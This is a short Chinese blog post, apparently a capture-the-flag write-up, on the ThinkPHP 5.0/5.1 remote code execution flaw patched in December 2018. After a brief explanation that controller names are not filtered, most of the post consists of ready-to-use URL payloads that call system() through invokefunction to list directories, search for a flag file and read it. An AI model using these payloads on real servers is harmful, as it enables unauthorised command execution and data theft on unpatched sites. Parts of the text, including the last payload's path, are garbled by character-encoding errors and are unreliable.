ThinkPHP V5 漏洞利用
ThinkPHP 5漏洞簡(jiǎn)介
ThinkPHP官方2018年12月9日發(fā)布重要的安全更新,修復(fù)了一個(gè)嚴(yán)重的遠(yuǎn)程代碼執(zhí)行漏洞。該更新主要涉及一個(gè)安全更新,由于框架對(duì)控制器名沒(méi)有進(jìn)行足夠的檢測(cè)會(huì)導(dǎo)致在沒(méi)有開(kāi)啟強(qiáng)制路由的情況下可能的getshell漏洞,受影響的版本包括5.0和5.1版本,推薦盡快更新到最新版本。
漏洞分析
程序未對(duì)控制器進(jìn)行過(guò)濾,導(dǎo)致攻擊者可以用 \(斜杠)調(diào)用任意類(lèi)方法。
漏洞利用
構(gòu)造payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“l(fā)s”);%27
尋找flag:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“find / -name ‘flag’”);%27
查看flag:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat …/…/…/flag”);%27
總結(jié)
以上是生活随笔為你收集整理的ThinkPHP V5 漏洞利用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 信用卡不激活也会扣费吗 有些信用卡不激活
- 下一篇: 攻防世界-Web_php_include